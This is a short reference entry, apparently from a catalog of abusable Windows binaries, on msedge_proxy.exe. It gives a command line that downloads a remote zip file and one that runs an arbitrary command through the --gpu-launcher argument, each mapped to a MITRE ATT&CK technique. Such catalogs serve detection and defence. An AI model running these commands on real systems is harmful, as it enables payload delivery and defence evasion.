msedge_proxy.exe

Microsoft Edge Browser

Download

Download file from the internet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe {REMOTEURL:.zip}

msedge_proxy will download malicious file. — MITRE: T1105 — Privileges: User

Execute

Executes a process under a trusted Microsoft signed binary

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&"

msedge_proxy.exe will execute file in the background — MITRE: T1218.015 — Privileges: User